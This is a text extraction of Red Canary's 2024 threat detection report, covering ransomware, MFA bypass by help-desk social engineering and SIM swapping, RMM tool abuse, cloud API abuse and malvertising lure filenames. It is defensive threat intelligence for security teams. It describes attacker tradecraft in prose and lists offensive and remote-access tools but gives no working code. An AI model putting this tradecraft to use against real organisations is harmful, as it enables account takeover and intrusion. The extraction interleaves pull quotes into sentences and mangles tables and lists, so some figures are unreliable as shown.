2024ThreatDetectionReport RedCanary
2024ThreatDetectionReport RedCanary
table of contents
introduction 3 techniques 89
PowerShell
(T1059.001) 92
methodology 5
Windows Command Shell
(T1059.003) 95
trends 8 Windows Management Instrumentation
(T1047) 98
Ransomware 10
Cloud Accounts
Initial access tradecraft 14 (T1078.004) 102
Identity attacks 17 Obfuscated Files or Information
Vulnerabilities 25 (T1027) 106
SmashJacker 87
acknowledgements 161
2024 Threat Detection Report 3
introduction
We are pleased to present Red Canary’s 2024 Threat Detection Report. Our
sixth annual retrospective, this report is based on in-depth analysis of nearly
60,000 threats detected across our more than 1,000 customers’ endpoints,
networks, cloud infrastructure, identities, and SaaS applications over the
past year. This report provides you with a comprehensive view of this threat
landscape, including new twists on existing adversary techniques, and the
trends that our team has observed as adversaries continue to organize,
commoditize, and ratchet up their cybercrime operations.
We also check back on the timeless threats and techniques that are prevalent
year-after-year, explore emerging ones that are worth keeping an eye on, and
introduce two new free tools that security teams can start using immediately.
methodology
Red Canary ingested 216 petabytes of security telemetry from our
more than 1,000 customers’ endpoints, identities, clouds, and SaaS
applications in 2023.
OVERVIEW
2.5M+ 216
endpoints, identities, and petabytes of
cloud resources protected security telemetry
4,000 37M
detection analytics potentially malicious
applied events generated
10M 9.5M
false positives identified by events resolved
the platform and pared down by automation
500k 58,000
events analyzed by humans threats detected
2024 Threat Detection Report 6
What counts
When our detection engineers develop detection analytics, they map
them to corresponding MITRE ATT&CK® techniques. If the analytic
uncovers a realized or confirmed threat, we construct a timeline that
includes detailed information about the activity we observed. Because we
know which ATT&CK techniques an analytic aims to detect, and we know
which analytics led us to identify a realized threat, we are able to look at
this data over time and determine technique prevalence, correlation, and
much more.
Limitations
RECONNAISSANCE
Red Canary optimizes heavily for detecting and responding rapidly
RESOURCE to early-stage adversary activity. As a result, the techniques that
DEVELOPMENT rank skew heavily between the initial access stage of an intrusion
and any rapid execution, privilege escalation, and lateral movement
INITIAL ACCESS attempts. This will be in contrast to incident response providers, whose
visibility tends towards the middle and later stages of an intrusion, or
a full-on breach.
EXECUTION
Knowing the limitations of any methodology is important as you determine
PERSISTENCE what threats your team should focus on. While we hope our list of top
threats and detection opportunities helps you and your team prioritize,
we recommend building your own threat model by comparing the top
PRIVILEGE
ESCALATION threats we share in our report with what other teams publish and what
you observe in your own environment.
DEFENSE EVASION
CREDENTIAL ACCESS
DISCOVERY
LATERAL MOVEMENT
COLLECTION
COMMAND
& CONTROL
EXFILTRATION
IMPACT
2024 Threat Detection Report 9
trends
Red Canary performed an analysis of emerging and significant trends
Ransomware that we’ve encountered in confirmed threats, intelligence reporting, and
elsewhere over the past year. We’ve compiled the most prominent trends
of 2023 in this report to show major themes that may continue into 2024.
Initial access tradecraft
The Technique and Threat sections of this report are focused on prevalent
ATT&CK techniques and threat associations from the more than 58,000
Identity attacks confirmed threats we detected in 2023. The Trends section takes us one
step beyond that data and allows us to narrate events that might not be
prevalent in our detection dataset but may be emergent or otherwise
Vulnerabilities deserve your attention.
TREND
Ransomware
Despite some promising disruptions to the ransomware
ecosystem in 2023, defenders should stay vigilant in
detecting common precursor behavior.
• Impacket
• Mimikatz
• SocGholish
• Qbot
• Raspberry Robin
Check out each of those pages for ideas on how to take action to detect
those threats. We’ve previously shared this simplified ransomware
intrusion chain as a way to think about detecting across the entire
intrusion, and in 2023, this chain continued to hold up as a high-level
approach to breaking down ransomware.
2024 Threat Detection Report 11
Initial access
Lateral movement
Reconnaissance
TAKE Visit the Ransomware trend page for relevant detection opportunities and
atomic tests to validate your coverage.
ACTION The good news for defenders is that even though new techniques and tools
have emerged, many ransomware techniques have remained the same for
the past several years. Continuing to focus on detection across the entire
ransomware intrusion chain—particularly ransomware precursors—remains
an effective strategy to ensure ransomware incidents have minimal impact.
The tried-and-true guidance of patching known vulnerabilities remains a
solid approach to preventing initial access, as many ransomware intrusions
start this way. If an organization can’t keep up with patching all vulnerabilities,
we recommend prioritizing based on vulnerabilities in internet-facing devices
that are also in CISA’s Known Exploited Vulnerabilities catalog.
2024 Threat Detection Report 14
TREND
Initial access tradecraft
Adversaries employed tried-and-true initial access
methods in 2023, with a few new variations on
perennial themes.
• One example at the beginning of 2023 was the abuse of OneNote files
to deliver payloads like Qbot. In one campaign in February, phishing
emails delivered malicious OneNote attachments. User interaction
opened and executed an embedded HTML Application file (.hta), a
batch script file (.bat), or PowerShell script file (.ps1), which then
pulled down the next stage payload. In May 2023, OneNote was
updated to block embedded files with commonly abused extensions
by default.
SEO poisoning
Malvertising
SEO poisoning is not the only way adversaries use search engines to their
advantage. Malicious advertising, also called “malvertising,” persisted in
2023, as seen with our most prevalent threat of the year, Charcoal Stork,
and related malware ChromeLoader and SmashJacker. Malvertising is
the use of fake ads on search engine pages that masquerade as legitimate
websites to download software like Zoom, TeamViewer, or various
software updates.
Vulnerability exploitation
Vulnerability exploitation is nothing new, and 2023 saw its fair share
of new CVEs being exploited in the wild. In November 2023 we saw
adversaries exploiting a Confluence vulnerability to ultimately deploy
2024 Threat Detection Report 16
TAKE Visit the Initial access tradecraft trend page for relevant detection
opportunities and atomic tests to validate your coverage.
ACTION Preventing container files like ISOs or VHDs from executing can still be an
effective way to avert damaging intrusions that attempt to evade MOTW
controls. If your users do not have a business need to mount container files,
we recommend taking steps to prevent Windows from auto-mounting
container files.
Some of the best ways to minimize the risk of vulnerability exploitation in your
environment include:
• patching regularly
• being aware of your surface area and what is exposed to the internet
2024 Threat Detection Report 17
TREND
Identity attacks
In the era of single-sign-on and cloud-based-
everything, there’s no better way for an adversary
to sneak into a corporate environment than by
compromising identities.
How do adversaries
compromise identities?
Adversaries can wield relatively unsophisticated and well-known
techniques to wrest control of user identities and cause disproportionate
harm to organizations. The increasing ubiquity of multi-factor
authentication (MFA) has thankfully complicated the matter, but creative
MFA bypass techniques are a major commonality among identity
compromises. Adversaries are getting better at abusing the difficult-to-
monitor mobile devices we frequently use for MFA in order to circumvent
imperfect implementations.
Working credentials are often just the beginning for adversaries, who must
overcome a gauntlet of additional security controls—most notably MFA—
before they are able to compromise an identity.
• phishing
• malware
• data leaks
• brute-force attacks
• man-in-the-middle (MitM) attacks
• watering-hole attacks
• previously compromised systems
We’re opting not to spend a great deal of time in this section on credential
theft in favor of new or emerging ways that adversaries get around MFA
and the specific elements of the login process that we often rely on to
differentiate legitimate login attempts from suspicious ones. For more
information on how adversaries steal credentials, refer to the following
2024 Threat Detection Report 19
The way it works is simple: Adversaries call the help desk, posing as an
internal employee in order to trick them into unwittingly resetting the
victim account’s MFA settings. Next, the adversary will register their
own mobile device, thereby gaining unauthorized access to a corporate
identity by fundamentally modifying the authentication sequence. Once
they gain access, the adversary can perform reconnaissance to profile the
2024 Threat Detection Report 20
SIM swapping
Mobile carriers are responsible for another glaring weakness in the
identity security ecosystem, and one that corporate security teams
can do precious little to mitigate. SIM card swapping has long been
a major problem for consumers, particularly in the online banking and
cryptocurrency space, where mobile devices play a critical role in backing
up account access. However, there’s real concern here for enterprises as
well, since SIM swapping can enable adversaries to commandeer mobile
phone numbers, hurdling MFA protections and taking over accounts. As
such, it’s important to include mobile carriers as an integral component
of an enterprise’s comprehensive risk profile because a carrier’s failure to
accurately verify their users’ identities can have an impact on enterprises
with little or no connection to that carrier.
Less glamorous than help desk social engineering or SIM swapping, socially
engineering users directly remains extremely effective. Victims commonly
receive either a text message (smishing) or a phone call instructing them to
relay an MFA code in response to a prompt initiated by the adversary. The
adversary may ask the victim to enter a number-matching code, send the
adversary a newly received SMS code, or have the victim simply accept
an MFA push notification. If successful, adversaries are then able to move
forward with their objectives, acting with the full rights and privileges of the
compromised user identity.
See the Take action section on the next page for guidance on leveraging
identity telemetry and alerts to prevent or detect suspicious login attempts.
2024 Threat Detection Report 22
TAKE Visit the Identity attacks trend page for relevant atomic tests to validate
your coverage.
ACTION In this section, we’ll offer guidance on how security teams can attempt to
mitigate the MFA circumvention, credential abuse, and suspicious login
activity described above.
• Require that help desk interactions take place over video and ensure that
help desk employees have access to a visual directory of the company.
• Ask the employee to provide personally identifiable information (PII),
including information that may be hard to obtain openly on the internet,
like employee identification numbers or even social security numbers.
• Require that employees and the help desk have access to a shared
secret (like a security question).
• Require employees to provide information about IT equipment they
possess that’s trivial for them to obtain but difficult for an adversary,
such as a laptop serial number.
• Ask behavior-based questions about applications the user uses, such
as when was the last time they logged in, where do they typically log in
from, etc.
2024 Threat Detection Report 23
TAKE • Consider attempting to verify the user via a third party, like contacting
their supervisor to validate the change request.
ACTION • Two-factor authentication (2FA) can help here as well, and you can
consider sending a verification code to the registered mobile device of
the user attempting to validate their identity.
Ultimately, the best protection against SIM swapping will come in the form
of government policy or technological advancement. While technology
advances are impossible to forecast, the Federal Communications
Commission (FCC) is in the process of adopting rules that would force
mobile carriers to better protect consumers from SIM swap fraud. It remains
to be seen whether these rules will be effective in practice, but it’s a step in
the right direction nonetheless.
ACTION Organizations can protect themselves from the simplest of phishing schemes
simply by implementing MFA, but it’s a starting point and clearly not a silver
bullet. Balancing user-friendly access with secure connectivity is always
challenging, and leaning too much towards convenience can pose significant
risks. Almost every MFA factor has some sort of weakness and a bypass
technique associated with it. Simply being mindful of these vulnerabilities is
important when determining which MFA implementation to choose. While
responding to an incident, being aware of these types of bypasses may
expand your investigation into areas and log sources that may not initially
be part of your breach response playbooks.
There’s no simple way to increase the fidelity of these types of alerts, but they
tend to be more effective when correlated with custom detection analytics or
other enrichment data, such as:
We covered MFA Request Generation in depth last year, and you can find
detailed detection guidance in that analysis. Simply put, you can detect MFA
exhaustion schemes by alerting on successful login attempts that correspond
with high volumes of MFA prompt requests.
2024 Threat Detection Report 25
TREND
Vulnerabilities
Despite some shiny new vulnerabilities in the headlines,
adversaries’ post-exploitation playbooks have largely
remained the same.
Predictable post-exploitation
• Immediately after exploitation, the adversaries nearly always took a
step to transfer tools to that compromised system. At this point, we
often observed PowerShell, certutil.exe, or curl.exe commands
used to make that compromised system download a remote access
tool such as Cobalt Strike or AnyDesk. In other cases, the adversary
would upload a web shell to the compromised server. This was the
case in the large-scale exploitation of MOVEit Transfer in May 2023.
In the case of the ManageEngine exploitation mentioned earlier, the
adversaries used variations of the tried-and-true Chopper web shell.
TAKE
Visit the Vulnerabilities trend page for relevant detection opportunities
and atomic tests to validate your coverage.
TREND
Stealers
If identities are the new perimeter, information-stealing
malware helps adversaries cross over.
Other families set themselves apart using new features, like LummaC2
adding the ability to revive expired Google OAuth account cookies
in November 2023. This same feature was quickly adopted by other
stealers by the end of the year, showing how quickly innovation can
spread among malware competitors.
TAKE Visit the Stealers trend page for relevant detection opportunities and
TREND
Remote monitoring
and management tools
Adversary abuse of remote monitoring and
management (RMM) tools attracted extra attention
in 2023, due in part to at least one prolific adversary
leveraging these tools extensively.
Adversaries have abused RMM tools for years, and they continued to do
so in 2023. RMM tools are an attractive option for adversaries because
they offer robust sets of remote administration features and they do so
with the veneer of legitimacy. Many organizations use one or another of
these tools to apply updates, manage assets, deploy software, and more.
If an adversary is lucky or has done their homework, they can complicate
detection immensely by abusing an RMM tool that is permitted within an
organization. Even in cases where an adversary is abusing an unpermitted
RMM tool, organizations may be slow to respond or reluctant to block its
use outright for fear that they may hinder a legitimate business use case.
NetSupport Manager
Remcos
Remote Utilities
Remote Utilities (RUT), also called RuRAT, is another RMM tool that
enables remote control, desktop sharing, and file transfers and is
delivered via malicious email attachments.
Atera
• AteraAgent.exe
• AgentPackageSTRemote.exe
• AgentPackageHeartbeat.exe
• AgentPackageWindowsUpdate.exe
• AgentPackageADRemote.exe
SCATTERED SPIDER
SCATTERED SPIDER is a cluster of interconnected adversaries known
for highly targeted SMS phishing (“smishing”), brazen social engineering
campaigns, and rapid lateral movement using a variety of RMM tools.
They abused scores of RMM tools in incidents throughout 2023. Since
other adversaries surely took note of their success throughout 2023 and
are likely to imitate them moving forward, we’re going to list the RMM tools
they reportedly abused and describe some of the problems these tools
present collectively and individually.
2024 Threat Detection Report 33
While not exhaustive, the group has reportedly used the following tools:
• AnyDesk
• ASG Remote Desktop
• BeAnywhere
• Domotz
• DWservice
• Fixme.it
• Fleetdeck.io
• GetScreen
• Itarian Endpoint Manager
• Level.io
• Logmein
• ManageEngine
• N-Able
• Pulseway
• RattyRat
• Rport
• Rsocx
• RustDesk
• RustScan
• ScreenConnect
• Splashtop
• SSH RevShell and RDP Tunnelling via SSH
• Teamviewer
• TightVNC
• TrendMicro Basecamp
• Sorillus
• Xeox
• ZeroTier
• ZohoAssist
“...a robust
While the use of open source RMM utilities like RustDesk and newer utilities
allowlist/blocklist
like FleetDeck is a troubling trend on its own—namely in that they are
policy is probably easily modified or largely unknown respectively—the total volume of RMM
the first and tools SCATTERED SPIDER abused can be overwhelming. The presence of
any of these tools on their own—or any other RMM tool for that matter—
most important isn’t necessarily malicious. Unless you adhere to strict allowlist/blocklist
step toward policies, which is easier said than done, there may be no action to take on
getting a handle these tools until an adversary starts performing overtly malicious activity.
The difficulty of getting tools like these under control can be exacerbated
on the types in environments with existing local administrative rights that give normal
of applications users the ability to freely install RMM tools, which becomes even more
permitted problematic when you’re being targeted by a sophisticated adversary.
However, a robust allowlist/blocklist policy is probably the first and most
within your important step toward getting a handle on the types of applications
environment.” permitted within your environment.
2024 Threat Detection Report 34
TAKE
Visit the Remote monitoring and management abuse trend page for
relevant detection opportunities.
ACTION Having the ability to collect and inspect binary signature metadata and
binary naming conventions and understanding common and uncommon
installation paths for RMM tools are the basic prerequisites for developing
an effective RMM detection strategy. Of course, the sheer volume of RMM
tools available to adversaries, let alone abused by them, renders confident
detection coverage a tall order.
The best generic advice for mitigating the risk posed by these tools is to
create robust allow/blocklist policies and strictly adhere to them. Depending
on your environment, one or more of these utilities may be permitted for use,
so before you go down the road of detection on these utilities, it is highly
recommended to get an effective inventory management tool to identify
any shadow utilities that may be lurking in your environment before you
start trying to detect these one at a time. Our open source baselining tool
Surveyor has a definitions file that you can use to search for the presence
of many of the tools listed in this section using a supported EDR tool.
TREND
API abuse in the cloud
Armed with stolen short-term tokens or credentials,
adversaries might be spending more time in cloud
services providers’ APIs than some administrators.
“Even when As businesses across the world have moved to cloud services and built
infrastructure on top of cloud providers, adversaries have followed them.
adversaries use Moving to the cloud has huge benefits, such as scalability, security, and
custom GUIs or developer-friendly application programming interfaces (API). It has also
brought new tools in the form of identity and access management (IAM)
are logged into
services, which allow businesses to control their accounts’ permissions in
their victims’ web a fine-grained manner. But with all these great benefits comes increased
consoles, they use attention from adversaries.
the same APIs as Adversaries have been pivoting into their victims’ cloud environments for
the businesses years, and they continued to do so in 2023 with gusto. They often leverage
they’re targeting.” open source tools to scan public cloud services, malware to steal access
keys from developers and administrators, and cloud APIs to maintain
persistence and otherwise satisfy their objectives. Even when adversaries
use custom GUIs or are logged into their victims’ web consoles, they use
the same APIs as the businesses they’re targeting.
In fact, it’s hard for adversaries to avoid using the APIs provided by the
cloud services, since this is often the only way to interact with cloud
services. This provides a great opportunity for defenders to detect and
respond to attacks in their cloud environments, since most services
provide some sort of unified log to analyze events.
even if your administrators don’t make direct use of the APIs offered by
cloud services, adversaries can. Stealing session cookies can give them
the ability to bypass MFA protections and initiate API calls that can do
just as much damage to an organization as accessing a web console.
TAKE
Visit the API abuse in the cloud trend page for relevant detection
opportunities and atomic tests.
ACTION For prevention and mitigation, much of the same strategies applied to
phishing can apply here. Applying least privileges to your IAM roles and
user accounts will help avoid a single identity compromise from turning into
a large incident. Requiring MFA whenever possible (AWS, Entra ID, M365)
can prevent adversaries from taking over an account entirely, especially if
they are not able to phish the MFA code from your users or you use FIDO
authentication tokens. In AWS, use IAM roles and short term tokens to
perform activities, as these provide a wealth of security benefits such as
automatic expiration of tokens, an easy method for revoking credentials,
and the ability to avoid storing secrets in source code. If you do need to
store secrets somewhere, use a secrets manager such as Azure Key Vault
or AWS Secrets Manager. These are easy to manage and far more secure
than rolling your own or storing secrets in source code.
2024 Threat Detection Report 38
TREND
Artificial intelligence
An important question looms in the infosec
conversation about AI: Will generative AI tools
better benefit defenders or adversaries?
Adversaries also have their eyes on GenAI to automate their own tasking,
helping to manage infrastructure, expedite phishing lure generation,
impersonate employees via deepfakes, and by leveraging open source
information and tools to create highly tailored operational plans for threats
like ransomware. As with all new technologies, individuals with malicious
intent will eventually adopt them, and it may or may not surprise you.
It’s important to differentiate between click bait headlines and truly
groundbreaking changes in adversary tactics and techniques that are
enabled by GenAI. Importantly, we don’t have smoking gun clear evidence
of adversaries using AI tools in their attack campaigns at this time, but
only a fool would bet against it.
AI for adversaries
We’ve written about the implications for AI for adversaries, particularly
how it will affect the malware ecosystem, on the Red Canary blog.
So we’ll start there.
AI and malware
Some of the potential benefits for malware developers include
leveraging AI to:
Among these, the third point is probably the most useful for adversaries,
since it may allow them to readily expand malware to make it cross-
platform or to adjust their tools on the fly, depending on the capabilities
of their target system. The likelihood of AI magically creating net new
malware capabilities seems low, largely because malware capabilities
are entirely dependent on already well-understood operating system
capabilities upon which AI has no impact. Ultimately, it seems like AI has
the potential to expedite capabilities that already exist.
AI for APTs
The specter of sophisticated, state-sponsored adversaries with
deep pockets looms large over this industry, and it’s easy to imagine a
thousand thought leaders furiously blogging about AI’s accelerant effect
on so-called advanced persistent threats (APTs). The reality though is that
state-level adversaries have likely had their hands on better AI tools than
their counterparts in private industry for the better part of a decade. The
same has always been true for exploit capabilities. Just look at the havoc
wrought by ETERNALBLUE, an exploit that was likely many years old when
it slipped into the public space, spread all over the world in a matter of
hours, and caused billions of dollars worth of damage.
AI for defenders
Enough about bad guys, let’s talk about the many ways that AI is
already making us more secure and making security professionals
“There has never better at their jobs.
been a more
GenAI enables defenders to have a general problem-solving tool at
promising general their fingertips. You no longer need to sit down and develop specialized
purpose tool to analysis scripts during incident investigation or security operations
help defenders projects. You can describe your tasks and objectives in plain language,
unlocking lower-level tasking that is typically done by more senior
level up and team members with more in-depth coding skills or job experience. The
keep up with the application of GenAI for defenders spans tasks like project planning,
evolving threat team tasking and task management, data analysis baselining, malware
analysis, and architecture planning. There has never been a more
and technology promising general purpose tool to help defenders level up and keep up
landscape.” with the evolving threat and technology landscape.
2024 Threat Detection Report 41
Imagine having a super-smart assistant who can not only read through
mountains of data but also highlight what’s important. LLMs are game
changers in how to handle this data deluge. For example, you could ask
an LLM to sift through logs varying from network sensors to cloud activity
logs and pinpoint potential security threats. It’s like having a detective
who can wade through the clutter to find the clues that matter.
But it can’t be that simple right? Yes! You feed a model like GPT-4 raw
data such as Microsoft Office Universal Audit Logs (UAL) and with
instructions as simple as a conversation, the AI analyzes this data looking
for patterns and anomalies. It can summarize its findings, suggest next
steps, and even create visual representations like tables and graphs to
make the trends clear.
Ready to take the LLMs output a step further? Ask the AI to generate
code in Python to automate your analysis, making your operations more
efficient and cost effective.
We may be veering too specifically into the parts of infosec that require
clear and consistent communication (e.g., security analysis, intelligence,
threat detection, incident response, etc.), but AI tools are very proficient
at taking disparate information from numerous sources and synthesizing
it down into a human-readable, readily consumable narrative.
Say you’re a SOC analyst, for example, and you’re reviewing a long
list of related but distinct alerts. You know they tell a compelling and
important story, but unpacking the origin and meaning of each alert
and then chaining them together into a meaningful story of what
happened is tedious and time-consuming. Not to mention that’s time
that you could otherwise spend investigating surrounding activity to
make sure you’ve got a handle on the entire scope of the event or incident
as the case may be.
2024 Threat Detection Report 42
A well-trained AI can immediately connect all these dots for you. It may
not be perfect, but it will be a plenty-good-enough starting point for you
to get a clear picture of what happened and what to do next, potentially
saving crucial minutes or hours of triage (or at least saving you from
tyranny of unnecessary work).
Finally, when it comes time to explain what happened, whether it’s for a
briefing, documentation, or something else, your LLM chatbot friend can
quickly write up a serviceable first draft that you’ll only have to revise.
On this note, we invite you to take an Atomic Red Team test and
experiment with using ChatGPT or Gemini as your personal tutor.
Instruct the AI to be your cybersecurity tutor, let it know the ways
to like to consume information, and paste in your favorite YAML file.
We’re confident you’ll be impressed by what you can achieve with
this AI-assisted learning you just discovered!
THE
As we’ve said here and elsewhere, we believe that AI is more of a net positive
for defenders than it is for adversaries. The use cases we described make
VERDICT
part of that point. However, another important factor to consider is resources.
As a collective—and often within reasonably well-funded security teams—we
have more money and more expertise than most adversaries. Whether you
work for a security vendor or on an organization’s internal security team, you
have money to spend on infrastructure and expertise. The security industry is
awash with formally educated data scientists and other specialists who can
leverage expensive and powerful tools to optimize AI in ways that simply are
not available to the overwhelming vast majority of adversaries.
2024 Threat Detection Report 44
TREND
Adversary emulation
and testing
More than a quarter of Red Canary’s customers
performed some kind of testing in 2023.
This is unauthorized activity This is authorized, The activity was This was testing
that will not be remediated non-testing activity incorrectly identified
The detected activity
We accept the risk of this The detected activity authorized The detected activity was part of internal or
software or behavior running for certain users. This threat will was a false positive. external testing.
in our environment and will not no longer be used when calculating
be remediating it at this time. risk to your organization.
2024 Threat Detection Report 45
Read the Industry and sector analysis section of this report for more
insights related to customers by industry.
The top threats that customers and their teams tested are
representative of the threats that we observe in the wild. In fact, there’s
a close correlation between not only the set of threats, but also their
ranking. Tools like Impacket, Mimikatz, BloodHound, and more are
highly prevalent in real-world incidents, appearing frequently atop our
monthly Intelligence Insights, and our testing data shows that customers
are paying attention and putting their technology, their teams, and our
own security operations team through the paces.
Snaffler
Empire 1.5%
2.0%
Rubeus
5.4%
Cobalt Strike
Impacket
5.4%
37.3%
Responder
5.4%
Metasploit
5.9%
CrackMapExec
8.3%
BloodHound
9.3%
Mimikatz
21.1%
2024 Threat Detection Report 47
TAKE
This analysis highlights the increased prevalence of testing across
organizations, irrespective size or industry. The quality of open source threat
ACTION
intelligence coupled with increasingly capable tools for adversary emulation
mean that every organization should be testing their defenses regularly,
even in the absence of broader investments in cybersecurity and incident
readiness.
2. Identify prevalent threats, keeping an eye out for prominent initial access
vectors in particular.
TREND
Industry and
sector analysis
Our analysis of technique and threat prevalence
and detection volume across sectors suggests
that an organization’s industry is not a key factor
in determining the level or nature of risk they face.
• Detection volume
• Threat prevalence
• Technique prevalence
However, from Red Canary’s perspective, which we’ll outline using the
data below, an organization’s industry alone is rarely the key factor
in differentiating the threats they face. Instead, we’ve observed
that the technologies an organization uses, the way their network is
configured, their IT hygiene, the data they have, and how they store it are
more important factors in determining their exposure to risks than is their
industry. Put another way, the factors that make companies alike have
2024 Threat Detection Report 49
“...the factors that more of an impact on the threats they face than the factors that set
them apart.
make companies
alike have more Additionally, the majority of threats we detect are opportunistic—
adversaries are looking for whatever victim they can compromise, perhaps
of an impact on
those that have a certain unpatched vulnerability or one from whom they
the threats they know they can elicit a ransom payment. Some adversaries target specific
face than the types of organizations—or even specific industries—but these represent
a minority of incidents we observe. Even when adversaries focus on a
factors that set specific industry, they seem to abuse the same common techniques.
them apart.”
In short, we recommend organizations prioritize the threats that are
most likely to affect them. Industry is one variable to consider, but your
main focus should be on the cross-section of threats that are highly
prevalent based on the technologies your organization uses, the data it
contains, and the ways it handles that data. Examining what makes your
organization a likely target across a wide range of variables will allow you
to have a better understanding of your threat model and the risk presented
by various threats.
Adjusting imbalances
As you can imagine, we have an unequal representation of customers
across industries. Industries with greater numbers of customers (or with
higher than average numbers of large customers) generate greater
volumes of detection than industries with fewer customers. Since this may
create the illusion of higher risk, we adjusted some metrics by dividing
detection volume by the number of customers within a given sector to
establish a “per capita” view of the figures. Thus, detection counts below
2024 Threat Detection Report 50
As you can see, customers in the information and wholesale trade sectors
generated far higher volumes of detection on average than customers in
any other sector. The information sector in particular likely tops this list
because of its relative density of large enterprise customers (see next
chart). Wholesale trade, on the other hand, has a relatively low density of
similarly-sized enterprise customers. While this anomaly is interesting, it’s
hard to pin down exactly why wholesale trade companies are generating
higher volumes of detection without burrowing deeper into the data.
2024 Threat Detection Report 51
As you can see, the contents of both lists are almost identical, with only
one technique in each list that isn’t in the other. T1003: OS Credential
Dumping is in our top 10 by volume but not frequency; it’s ranked 11
2024 Threat Detection Report 53
We’ve explained why a lot of these techniques are prevalent in this and
the five previous Threat Detection Reports, but the reasons they might
affect a wide swath of industries include the following:
Taking this analysis one step further, we applied the Jaccard Similarity
Index, which measures similarities between two sets of data, to compare
each sector’s top 10 techniques to the overall top 10 techniques from our
dataset. The index applies a score of between 0 (not at all similar) and 1
(completely similar) to the two data sets.
Administrative and Support and Waste Management and Remediation Services 0.54
Information 0.43
Utilities 0.37
Manufacturing 0.33
Construction 0.33
The industries with the highest similarity score are the most representative
of overall detection trends in our data. By contrast, industries with lower
similarity scores may face unique threats, possibly because there are
some specialized aspects of the IT infrastructure across the organizations
in that industry. Ultimately, this analysis shows yet again that there is a
great deal of similarity in technique prevalence across industries. Even
at the low end of this list, where the similarity score is a seemingly low
0.19, it’s notable given there are 201 techniques and 424 sub-techniques
in MITRE ATT&CK. Despite all those potential techniques, no industry
top 10 was entirely unique.
The following are prevalence lists for industries with the highest volumes
of detection across our data. Since we’ve discussed many of these
techniques at length in this and previous reports, we won’t spend much
time retreading why the most common of these techniques are prevalent.
However, we’ll include some analytical notes beneath each industry list.
1. T1059.001: PowerShell
2. T1059.003: Windows Command Shell
3. T1078.004: Cloud Accounts
4. T1047: Windows Management Instrumentation
5. T1218.011: Rundll32
6. T1105: Ingress Tool Transfer
7. T1027:Obfuscated Files or Information
8. T1036.005: Match Legitimate Name or Location
9. T1546.008: Accessibility Features
10. T1055: Process Injection
1. T1059.001: PowerShell
2. T1059.003: Windows Command Shell
3. T1057: Process Discovery
4. T1569.002: Service Execution
5. T1027.006: HTML Smuggling
6. T1021.003: Distributed Component Object Model
7. T1036.003: Rename System Utility
8. T1546.008: Accessibility Features
9. T1003: OS Credential Dumping
10. T1218.011: Rundll32
2024 Threat Detection Report 56
Manufacturing
Information
Educational Services
Email Forwarding Rule and Email Hiding Rules are probably on this
list due to heavy reliance on email communications within educational
institutions, which adversaries target to steal sensitive information. We
wrote about one such campaign in a blog in the summer of 2023.
1. T1059.001: PowerShell
2. T1078.004: Cloud Accounts
3. T1059.003: Windows Command Shell
4. T1140: Deobfuscate/Decode Files or Information
5. T1114.003: Email Forwarding Rule
6. T1047: Windows Management Instrumentation
7. T1059.004: Unix Shell
8. T1053.003: Cron
9. T1105: Ingress Tool Transfer
10. T1059.005: Visual Basic
As was the case with the Information industry, the presence of Visual
Basic and Unix Shell on this list are likely reflections of the varied systems
and platforms used at hospitals and healthcare companies and the
adversary desire to infiltrate those systems.
2024 Threat Detection Report 58
Threats by industry
Our analysis of industry targeting trends among prevalent threats
revealed that there were few instances of meaningful trends. We
assess that the vast majority of threats we detect are commodity
threats that target organizations indiscriminately. Nonetheless, the
following list includes the insights we observed among prevalent
threats throughout the year:
• Raspberry Robin is also a worm that spreads via USB, and it also
seems to disproportionately affect manufacturers, likely for the very
same reasons as Gamarue.
threats The following chart illustrates the specific threats Red Canary detected
most frequently across our customer environments in 2023. We ranked
these threats by the percentage of customer organizations affected
to prevent a single, major security event from skewing the metrics. We
excluded threat detections associated with customer-confirmed testing.
2022 2023
RANKING RANKING 2023 TOP 10 THREATS DETECTED
2 2 Impacket (5.6%)
5 2 3 Mimikatz (4.9%)
6 1 5 SocGholish (4.5%)
20 14 6 ChromeLoader (3.3%)
10 3 7 Gamarue (3.1%)
1 7 8 Qbot (2.9%)
We’ve written extensive analysis for each of the 10 threats. This PDF
includes an abridged version of our findings, covering analysis of relevant,
novel, or changing threat tradecraft and advice for mitigating the effects
of the threat. You can view the full analysis—including detection and
testing guidance—in the web version of this report.
THREAT
Charcoal Stork
Named by Red Canary, Charcoal Stork is a
suspected pay-per-install (PPI) content provider that
uses malvertising to deliver installers, often masquerading
as cracked games, fonts, or desktop wallpaper.
#1 14.9%
OVERALL CUSTOMERS
RANK AFFECTED
Early Charcoal Stork samples were ISO files with payloads leading
to multiple phases, including a NodeJS-based app and PowerShell
commands to achieve persistence and install ChromeLoader. Public
reporting captured this entire sequence of activity as ChromeLoader,
however, internally we tracked the initial lure and dropper separately
from the payload, in order to determine if there might be multiple actors
involved. Tracking browser hijackers might not sound glamorous but
the sheer volume and success of delivery from Charcoal Stork could
not be ignored.
2024 Threat Detection Report 63
Special deliveries
In 2023, Charcoal Stork payloads began to evolve in ways that provided
additional insight into how these pieces were related. In addition to the
ISO files delivered in 2022, we observed Charcoal Stork delivering a
variety of file types, including VBS files in late 2022 and early 2023, and
MSI and EXE files later in 2023.
• portfolio _ _ _ .1natazgl.exe.part
• portfolio _ _ _ .exe
TAKE •
•
bluey font (1).exe
portfolio _ _ _ (1).exe
ACTION
• bluey font.exe
• file _ fallout _ v2 _ 1 _ 0 _ 18 _ zip
_ _ _ (1).exe
• barbie (1).exe
• carolina panthers live stream.exe
Visit the Charcoal Stork
• scarlip - no statements ( instrumental ).exe
threat page for detection
• carolina panthers live stream (1).exe
opportunities and atomic
• how to make a living trading foreign exchange p _ _ _ .
tests to validate your
exe
coverage for this threat.
• top gear uk season 10eps10.tmp
• 736x1104 coachella 2018 wallpaper.tmp
Because Charcoal Stork’s
• install (4).exe
success relies on user
• install (3).exe
interaction, user education
on the risks of ads and
downloading wallpaper and
cracked games on company
Making sense of grey areas
computers is a first line
Our understanding of Charcoal Stork continues to evolve. We have
of defense. However, as
observed this threat exhibit massive spikes in activity during active
the volume of Charcoal
campaigns, followed by lulls when we are uncertain where it has gone.
Stork downloads we saw
The majority of the Charcoal Stork threats we detected in 2023 came in
this year indicates, there
April and September, and while we continued to see a lower volume of
will always be users who
activity through the end of the year, it has mostly been related to older
click. Using an adblocker
campaigns. We spoke about some of our intelligence gaps regarding this
can help reduce the risk
threat in our September 2023 Intelligence Insights, and we want to
of malicious downloads
echo that call for collaboration:
from malvertising. Applying
application allowlisting is
If you are also tracking an aspect of Charcoal Stork, we would appreciate
another effective strategy
the opportunity to collaborate as we seek to better understand this threat.
to reduce the risk of rogue
(Please send us an email!)
downloads. However, it
